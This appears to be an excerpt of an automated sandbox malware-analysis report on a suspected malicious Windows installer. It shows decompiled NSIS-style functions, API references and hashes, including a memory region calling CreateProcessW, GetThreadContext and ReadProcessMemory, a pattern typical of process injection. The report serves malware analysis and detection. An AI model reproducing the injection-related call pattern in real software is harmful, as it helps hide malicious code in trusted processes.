                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                          • API String ID: 3751793516-501415292
                                                                          • Opcode ID: b62097c57e7d34c826c8a34a39378d9677be106aa900e81be982e0e3289ee102
                                                                          • Instruction ID: afcdff62d0ef6905e8bdcee54b475e891262542c39ccdc99bb158fdd5f3a4caf
                                                                          • Opcode Fuzzy Hash: b62097c57e7d34c826c8a34a39378d9677be106aa900e81be982e0e3289ee102
                                                                          • Instruction Fuzzy Hash: BB012631908141ABDB213B755C449BF7BB0DA62774B68063FF8D1B22E2C63C49468A3F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004056DB, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004056DB(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                          0x004056df
                                                                          0x004056e5
                                                                          0x004056e6
                                                                          0x004056e6
                                                                          0x004056e7
                                                                          0x004056ee
                                                                          0x004056f8
                                                                          0x00405705
                                                                          0x00405708
                                                                          0x00405710
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405714
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405716
                                                                          0x00000000
                                                                          0x00405716
                                                                          0x00000000

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 004056EE
                                                                          • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403164,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 00405708
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004056DE
                                                                          • nsa, xrefs: 004056E7
                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056DB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CountFileNameTempTick
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                                                          • API String ID: 1716503409-1609819632
                                                                          • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                          • Instruction ID: 324ea9cf7fdad1bcdd77eed69f700b3778f381b3ee49d7efb620425ca15f8701
                                                                          • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                          • Instruction Fuzzy Hash: 95F0203230C208BAEB104E19EC04B9B3F98DFD1720F10C03BFA089A1C0D2B0994897A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02910034, Relevance: 6.6, APIs: 4, Instructions: 555processthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 0291037D
                                                                          • GetThreadContext.KERNELBASE(?,00010007), ref: 029103A0
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 029103C4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.220670913.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadThread
                                                                          • String ID:
                                                                          • API String ID: 2411489757-0
                                                                          • Opcode ID: 56ebddca83213403c5d1c01c692080bc5898a4498ef1d4883b9431432a17059a
                                                                          • Instruction ID: 97a87e894757a96b68947160b443d7b2e5e17dd7f8459f896ee247fdc4a5fb09
                                                                          • Opcode Fuzzy Hash: 56ebddca83213403c5d1c01c692080bc5898a4498ef1d4883b9431432a17059a
                                                                          • Instruction Fuzzy Hash: FA320531E4021CEEEB20DFA5DD45BADB7B5AF48704F20459AEA18FA2A0D7715A80CF15
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403132, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 84%
                                                                          			E00403132(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405C17(_t6);
				_t2 = E00405554(_t6);
				if(_t2 != 0) {
					E004054E8(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004056DB("\"C:\\Users\\hardz\\Desktop\\LWlcpDjYIQ.exe\" ", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                          0x00403133
                                                                          0x00403139
                                                                          0x0040313f
                                                                          0x00403146
                                                                          0x0040314b
                                                                          0x00403153
                                                                          0x0040315f
                                                                          0x00403165
                                                                          0x00403149
                                                                          0x00403149
                                                                          0x00403149

                                                                          APIs
                                                                            • Part of subcall function 00405C17: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C6F
                                                                            • Part of subcall function 00405C17: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C7C
                                                                            • Part of subcall function 00405C17: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C81
                                                                            • Part of subcall function 00405C17: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C91
                                                                          • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00403153
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                          • String ID: "C:\Users\user\Desktop\LWlcpDjYIQ.exe" $C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 4115351271-3034223806
                                                                          • Opcode ID: 9f26b915baf4af9ee834ce2d89a8bc0c97eabdbefea6e2b6526d35449a18764c
                                                                          • Instruction ID: 79f712b3a5127264f0764a8e69035eccad8d8fc9e3ddf1834021473dbb68359f
                                                                          • Opcode Fuzzy Hash: 9f26b915baf4af9ee834ce2d89a8bc0c97eabdbefea6e2b6526d35449a18764c
                                                                          • Instruction Fuzzy Hash: C0D0C92195AD3076D952362A3E06FCF154C8F5AB6AF529077F508B90C68B6C1AC309FE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040136D, Relevance: 3.1, APIs: 2, Instructions: 55windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 73%
                                                                          			E0040136D(signed int _a4, struct HWND__* _a11) {
				intOrPtr* _t8;
				int _t10;
				signed int _t12;
				int _t13;
				int _t14;
				signed int _t21;
				int _t24;
				signed int _t27;

				_t27 = _a4;
				while(_t27 >= 0) {
					_t8 = _t27 * 0x1c +  *0x42f450;
					__eflags =  *_t8 - 1;
					if( *_t8 == 1) {
						break;
					}
					_push(_t8); // executed
					_t10 = E00401439(); // executed
					__eflags = _t10 - 0x7fffffff;
					if(_t10 == 0x7fffffff) {
						return 0x7fffffff;
					}
					__eflags = _t10;
					if(__eflags < 0) {
						_t10 = E00405952(0x430000 - (_t10 + 1 << 0xa), 0x430000);
						__eflags = _t10;
					}
					if(__eflags != 0) {
						_t12 = _t10 - 1;
						_t21 = _t27;
						_t27 = _t12;
						_t13 = _t12 - _t21;
						__eflags = _t13;
					} else {
						_t13 = 1;
						_t27 = _t27 + 1;
					}
					__eflags = _a11;
					if(_a11 != 0) {
						 *0x42ec0c =  *0x42ec0c + _t13;
						_t14 =  *0x42ebf4; // 0x0
						__eflags = _t14;
						_t24 = (0 | _t14 == 0x00000000) + _t14;
						__eflags = _t24;
						SendMessageA(_a11, 0x402, MulDiv( *0x42ec0c, 0x7530, _t24), 0);
					}
				}
				return 0;
			}











                                                                          0x0040136e
                                                                          0x004013fb
                                                                          0x00401382
                                                                          0x00401384
                                                                          0x00401387
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00401389
                                                                          0x0040138a
                                                                          0x0040138f
                                                                          0x00401394
                                                                          0x00000000
                                                                          0x00401409
                                                                          0x00401396
                                                                          0x00401398
                                                                          0x004013a6
                                                                          0x004013ab
                                                                          0x004013ab
                                                                          0x004013ad
                                                                          0x004013b5
                                                                          0x004013b6
                                                                          0x004013b8
                                                                          0x004013ba
                                                                          0x004013ba
                                                                          0x004013af
                                                                          0x004013b1
                                                                          0x004013b2
                                                                          0x004013b2
                                                                          0x004013bc
                                                                          0x004013c1
                                                                          0x004013c3
                                                                          0x004013c9
                                                                          0x004013d2
                                                                          0x004013d7
                                                                          0x004013d7
                                                                          0x004013f5
                                                                          0x004013f5
                                                                          0x004013c1
                                                                          0x00000000

                                                                          APIs
                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
                                                                          • SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 52571e9a05d543f28becb04bb20ff3b97162573d1bf40450b7f866ea0ca4ed37
                                                                          • Instruction ID: cf07787b3771b01f225f0462f812935fb09dc15a82745279c290e788aa7168a4
                                                                          • Opcode Fuzzy Hash: 52571e9a05d543f28becb04bb20ff3b97162573d1bf40450b7f866ea0ca4ed37
                                                                          • Instruction Fuzzy Hash: A101DE727242109FE7185B3ADD09B3B26D8E714318F40423EF952E66F0E6B8EC028B49
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004056AC, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E004056AC(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                          0x004056b0
                                                                          0x004056bd
                                                                          0x004056d2
                                                                          0x004056d8

                                                                          APIs
                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 004056B0
                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 004056D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: File$AttributesCreate
                                                                          • String ID:
                                                                          • API String ID: 415043291-0
                                                                          • Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                                          • Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
                                                                          • Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                                          • Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004030E9, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004030E9(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                          0x004030ed
                                                                          0x00403100
                                                                          0x00403108
                                                                          0x00000000
                                                                          0x0040310f
                                                                          0x00000000
                                                                          0x00403111

                                                                          APIs
                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0C,000000FF,00000004,00000000,00000000,00000000), ref: 00403100
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                          • Instruction ID: e81e275afb49510b14cdae0e049fdcddcae928b761bf1a0ea33109ac8d4bf1d9
                                                                          • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                          • Instruction Fuzzy Hash: 03E08C32514118BBDF105E52DC01EE77B7CEB087A2F008032FD04EA191D631EE11DBA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040311B, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0040311B(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
				return _t2;
			}




                                                                          0x00403129
                                                                          0x0040312f

                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00403129
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                          • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                                                          • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                          • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 00404EBC, Relevance: 66.8, APIs: 37, Strings: 1, Instructions: 277windowclipboardmemoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 90%
                                                                          			E00404EBC(long _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				CHAR* _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t86;
				struct HMENU__* _t88;
				unsigned int _t91;
				unsigned int _t92;
				int _t93;
				int _t94;
				long _t97;
				void* _t100;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t148;
				int _t149;
				struct HWND__* _t153;
				struct HWND__* _t157;
				struct HMENU__* _t159;
				long _t161;
				CHAR* _t162;
				CHAR* _t163;

				_t153 =  *0x42ec04; // 0x0
				_t148 = 0;
				_v8 = _t153;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404E50, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L16:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L24:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L19;
							}
							__eflags = _a12 - _t153;
							if(_a12 != _t153) {
								goto L19;
							}
							_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
							__eflags = _t86 - _t148;
							_a8 = _t86;
							if(_t86 <= _t148) {
								L36:
								return 0;
							}
							_t88 = CreatePopupMenu();
							_push(0xffffffe1);
							_push(_t148);
							_t159 = _t88;
							AppendMenuA(_t159, _t148, 1, E004059FD(_t148, _t153, _t159));
							_t91 = _a16;
							__eflags = _t91 - 0xffffffff;
							if(_t91 != 0xffffffff) {
								_t149 = _t91;
								_t92 = _t91 >> 0x10;
								__eflags = _t92;
								_t93 = _t92;
							} else {
								GetWindowRect(_t153,  &_v24);
								_t149 = _v24.left;
								_t93 = _v24.top;
							}
							_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
							_t161 = 1;
							__eflags = _t94 - 1;
							if(_t94 == 1) {
								_v56 = _t148;
								_v44 = 0x42a8a0;
								_v40 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t97 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t148;
									_t161 = _t161 + _t97 + 2;
								} while (_a4 != _t148);
								OpenClipboard(_t148);
								EmptyClipboard();
								_t100 = GlobalAlloc(0x42, _t161);
								_a4 = _t100;
								_t162 = GlobalLock(_t100);
								do {
									_v44 = _t162;
									SendMessageA(_v8, 0x102d, _t148,  &_v64);
									_t163 =  &(_t162[lstrlenA(_t162)]);
									 *_t163 = 0xa0d;
									_t162 =  &(_t163[2]);
									_t148 = _t148 + 1;
									__eflags = _t148 - _a8;
								} while (_t148 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebec - _t148; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f424, 8);
							__eflags =  *0x42f4ac - _t148;
							if( *0x42f4ac == _t148) {
								E00404D7E( *((intOrPtr*)( *0x42a078 + 0x34)), _t148);
							}
							E00403D9C(1);
							goto L24;
						}
						 *0x429c70 = 2;
						E00403D9C(0x78);
						goto L19;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L19:
							return E00403E2A(_a8, _a12, _a16);
						}
						ShowWindow( *0x42ebf0, _t148);
						ShowWindow(_t153, 8);
						E00404196();
						goto L16;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_v56 = 2;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42f428;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec04 = _t127;
				_v8 = _t127;
				E00403DF8( *0x42ebf0);
				 *0x42ebf4 = E00404616(4);
				 *0x42ec0c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t148) {
					SendMessageA(_v8, 0x1024, _t148, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403DC3(_a4);
				if(( *0x42f430 & 0x00000003) != 0) {
					ShowWindow( *0x42ebf0, _t148);
					if(( *0x42f430 & 0x00000002) != 0) {
						 *0x42ebf0 = _t148;
					} else {
						ShowWindow(_v8, 8);
					}
				}
				_t157 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t157, 0x401, _t148, 0x75300000);
				if(( *0x42f430 & 0x00000004) != 0) {
					SendMessageA(_t157, 0x409, _t148, _a12);
					SendMessageA(_t157, 0x2001, _t148, _a8);
				}
				goto L36;
			}


































                                                                          0x00404ec5
                                                                          0x00404ecb
                                                                          0x00404ed4
                                                                          0x00404ed7
                                                                          0x0040505d
                                                                          0x00405064
                                                                          0x00405088
                                                                          0x00405088
                                                                          0x0040508e
                                                                          0x0040509b
                                                                          0x004050b8
                                                                          0x004050b8
                                                                          0x004050bf
                                                                          0x00405116
                                                                          0x00405116
                                                                          0x0040511a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040511c
                                                                          0x0040511f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405129
                                                                          0x0040512f
                                                                          0x00405131
                                                                          0x00405134
                                                                          0x00405231
                                                                          0x00000000
                                                                          0x00405231
                                                                          0x0040513a
                                                                          0x00405140
                                                                          0x00405142
                                                                          0x00405143
                                                                          0x0040514f
                                                                          0x00405155
                                                                          0x00405158
                                                                          0x0040515b
                                                                          0x00405170
                                                                          0x00405173
                                                                          0x00405173
                                                                          0x00405176
                                                                          0x0040515d
                                                                          0x00405162
                                                                          0x00405168
                                                                          0x0040516b
                                                                          0x0040516b
                                                                          0x00405184
                                                                          0x0040518c
                                                                          0x0040518d
                                                                          0x0040518f
                                                                          0x00405198
                                                                          0x0040519b
                                                                          0x004051a2
                                                                          0x004051a9
                                                                          0x004051b1
                                                                          0x004051b1
                                                                          0x004051bf
                                                                          0x004051c5
                                                                          0x004051c8
                                                                          0x004051c8
                                                                          0x004051cf
                                                                          0x004051d5
                                                                          0x004051de
                                                                          0x004051e5
                                                                          0x004051ee
                                                                          0x004051f0
                                                                          0x004051f3
                                                                          0x004051fc
                                                                          0x00405208
                                                                          0x0040520a
                                                                          0x00405210
                                                                          0x00405211
                                                                          0x00405212
                                                                          0x00405212
                                                                          0x0040521a
                                                                          0x00405225
                                                                          0x0040522b
                                                                          0x0040522b
                                                                          0x00000000
                                                                          0x0040518f
                                                                          0x004050c1
                                                                          0x004050c7
                                                                          0x004050f7
                                                                          0x004050f9
                                                                          0x004050ff
                                                                          0x0040510a
                                                                          0x0040510a
                                                                          0x00405111
                                                                          0x00000000
                                                                          0x00405111
                                                                          0x004050cb
                                                                          0x004050d5
                                                                          0x00000000
                                                                          0x0040509d
                                                                          0x0040509d
                                                                          0x004050a3
                                                                          0x004050da
                                                                          0x00000000
                                                                          0x004050e3
                                                                          0x004050ac
                                                                          0x004050b1
                                                                          0x004050b3
                                                                          0x00000000
                                                                          0x004050b3
                                                                          0x0040509b
                                                                          0x00404edd
                                                                          0x00404ee1
                                                                          0x00404eea
                                                                          0x00404ef1
                                                                          0x00404ef4
                                                                          0x00404ef7
                                                                          0x00404efa
                                                                          0x00404efb
                                                                          0x00404efc
                                                                          0x00404f15
                                                                          0x00404f18
                                                                          0x00404f22
                                                                          0x00404f31
                                                                          0x00404f39
                                                                          0x00404f41
                                                                          0x00404f46
                                                                          0x00404f49
                                                                          0x00404f55
                                                                          0x00404f5e
                                                                          0x00404f67
                                                                          0x00404f8a
                                                                          0x00404f90
                                                                          0x00404fa1
                                                                          0x00404fa6
                                                                          0x00404fb4
                                                                          0x00404fc2
                                                                          0x00404fc2
                                                                          0x00404fc7
                                                                          0x00404fd5
                                                                          0x00404fd5
                                                                          0x00404fda
                                                                          0x00404fdd
                                                                          0x00404fe2
                                                                          0x00404fee
                                                                          0x00404ff7
                                                                          0x00405004
                                                                          0x00405013
                                                                          0x00405006
                                                                          0x0040500b
                                                                          0x0040500b
                                                                          0x00405004
                                                                          0x00405028
                                                                          0x00405031
                                                                          0x0040503a
                                                                          0x0040504a
                                                                          0x00405056
                                                                          0x00405056
                                                                          0x00000000

                                                                          APIs
